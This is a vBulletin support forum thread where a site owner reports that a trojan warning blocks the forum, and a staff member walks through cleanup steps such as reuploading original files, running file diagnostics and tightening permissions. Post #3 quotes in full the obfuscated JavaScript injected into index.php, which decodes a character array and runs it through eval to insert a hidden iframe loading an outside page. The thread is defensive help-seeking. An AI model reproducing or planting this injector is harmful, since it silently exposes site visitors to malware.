Announcement

Collapse
No announcement yet.

My Vb Forum got hacked?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • My Vb Forum got hacked?

    Hello All, My vbuletin forum got hacked or something like thta when i open it in firefox it gives error and not opens erro is trojan virus which my antivirus detects and the site didnt opening. Screenshot is attached with this please tell me what should i do Waiting for a help full reply.
    Attached Files

  • #2
    To troubleshoot this, first download a fresh copy of the vBulletin ZIP file from the Members Area then reupload all the original vB non-image files (except install.php). Make sure you upload these in ASCII format and overwrite the ones on the server. Also be sure to upload the admincp files to whichever directory you have set in your config.php file. Then run 'Suspect File Versions' in Diagnostics to make sure you have all the original files for your version and that none show 'File does not contain expected contents':

    Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions

    [Note: In some cases you may also need to remove any of the listed .xml files in the includes/xml directory.]

    Next, disable all plugins.

    Note: To temporarily disable the plugin system, edit config.php and add this line right under <?php

    define('DISABLE_HOOKS', true);

    Then if you still have this problem, create a new style and choose no parent style. This will force it to use the default templates. Finally empty your browser cache, close all browser windows then try again. Make sure you change to the new style and view your forums with it.

    Do you have the same problem?
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.

    Comment


    • #3
      Originally posted by Wayne Luke View Post
      To troubleshoot this, first download a fresh copy of the vBulletin ZIP file from the Members Area then reupload all the original vB non-image files (except install.php). Make sure you upload these in ASCII format and overwrite the ones on the server. Also be sure to upload the admincp files to whichever directory you have set in your config.php file. Then run 'Suspect File Versions' in Diagnostics to make sure you have all the original files for your version and that none show 'File does not contain expected contents':

      Admin CP -> Maintenance -> Diagnostics -> Suspect File Versions

      [Note: In some cases you may also need to remove any of the listed .xml files in the includes/xml directory.]

      Next, disable all plugins.

      Note: To temporarily disable the plugin system, edit config.php and add this line right under <?php

      define('DISABLE_HOOKS', true);

      Then if you still have this problem, create a new style and choose no parent style. This will force it to use the default templates. Finally empty your browser cache, close all browser windows then try again. Make sure you change to the new style and view your forums with it.

      Do you have the same problem?
      Hello wayne thank for your reply

      i have oppend up my c panel and saw my index.php file on line 1 there was a code

      <script>if(window.document)aa=0+[];aaa='0';try{new"a".prototype}catch(hgberger){if(aa===aaa)
      f=['-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z 2z1z60z73z62z83z1z3z53z10z55z3z85z-25z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-25z-29z-29z87z-6z63z70z77z63z-6z85z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z70z79z69z59z77z78z76z73z83z8z67z72z9z71z59z67z72z8z74z6 6z74z25z74z59z65z63z23z19z19z12z10z11z12z10z14z62z19z10z13z61z12z13z62z1z-6z81z67z62z78z66z23z1z11z10z1z-6z66z63z67z65z66z78z23z1z11z10z1z-6z77z78z83z70z63z23z1z80z67z77z67z60z67z70z67z78z83z20z66z67z62z62z63z72z21z74z73z77z67z78 z67z73z72z20z59z60z77z73z70z79z78z63z21z70z63z64z78z20z10z21z78z73z74z20z10z21z1z24z22z9z6 7z64z76z59z71z63z24z-4z3z21z-25z-29z-29z87z-25z-29z-29z64z79z72z61z78z67z73z72z-6z67z64z76z59z71z63z76z2z3z85z-25z-29z-29z-29z80z59z76z-6z64z-6z23z-6z62z73z61z79z71z63z72z78z8z61z76z63z59z78z63z31z70z63z71z63z72z78z2z1z67z64z76z59z71z63z1 z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z77z76z61z1z6z1z66z78z78z74z20z9z9z70z79 z69z59z77z78z76z73z83z8z67z72z9z71z59z67z72z8z74z66z74z25z74z59z65z63z23z19z19z12z10z11z12 z10z14z62z19z10z13z61z12z13z62z1z3z21z64z8z77z78z83z70z63z8z80z67z77z67z60z67z70z67z78z83z 23z1z66z67z62z62z63z72z1z21z64z8z77z78z83z70z63z8z74z73z77z67z78z67z73z72z23z1z59z60z77z73 z70z79z78z63z1z21z64z8z77z78z83z70z63z8z70z63z64z78z23z1z10z1z21z64z8z77z78z83z70z63z8z78z 73z74z23z1z10z1z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z81z67z62z78z66z1z6z1z11z10 z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z66z63z67z65z66z78z1z6z1z11z10z1z3z21z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2 z1z60z73z62z83z1z3z53z10z55z8z59z74z74z63z72z62z29z66z67z70z62z2z64z3z21z-25z-29z-29z87'][0].split('z');md='a';e=eval;w=f;s=[];r=String.fromCharCode;for(i=0;609>i;i+=1){j=i;s=s+r(38+1*w[j]);}
      if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>
      i just closed that and i deleted the index.php file and uploded new one and it solved but when i try to log in it again gives error and virus of trojan then i deleted login.php and uploded new now its working fine please tell me that should i have to check more files or not?

      Comment


      • #4
        You should check all files under Maintenance -> Diagnostics -> Suspect File Versions Diagnostic.

        You should also make sure your files are chmod 0644 so that others can't write to them.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API - Full / Mobile
        Vote for your favorite feature requests and the bugs you want to see fixed.

        Comment


        • #5
          Originally posted by Wayne Luke View Post
          You should check all files under Maintenance -> Diagnostics -> Suspect File Versions Diagnostic.

          You should also make sure your files are chmod 0644 so that others can't write to them.
          mate i did checked that and got a lot files with this error

          Code:
          File not recognized as part of vBulletin
          What should i do now next

          Comment


          • #6
            i replaced the files with the backup files and now when i clik dignosttics it show me some thing like this

            application-edit.php File not recognized as part of vBulletin
            application-forms.php File not recognized as part of vBulletin
            application-types.php File not recognized as part of vBulletin
            arcade.php File not recognized as part of vBulletin
            arcadetourmnt.php File not recognized as part of vBulletin
            autotagger_ajax.php File not recognized as part of vBulletin
            before this when virus was there its showing
            File does not contain expected contents please tell me that my virus got removed or not?

            Comment


            • #7
              They are either from addons that you've installed or compromising files. You'll need to review each of them with the third-party addons you installed.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API - Full / Mobile
              Vote for your favorite feature requests and the bugs you want to see fixed.

              Comment


              • #8
                Originally posted by Mark_Zuckerberg View Post
                i replaced the files with the backup files and now when i clik dignosttics it show me some thing like this
                The files "arcade.php" and "arcadetourmnt.php" are both from v3 Arcade and is why they are listed. You may want to download fresh copies from vBadvanced.com (v3A is now a vBa product).
                [URL="http://coolscifi.com"]Cool Sci-Fi[/URL="http://coolscifi.com"] | [URL="http://awalkerbit.me"]Walking Dead[/URL="awalkerbit.me"]

                Comment

                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                Working...
                X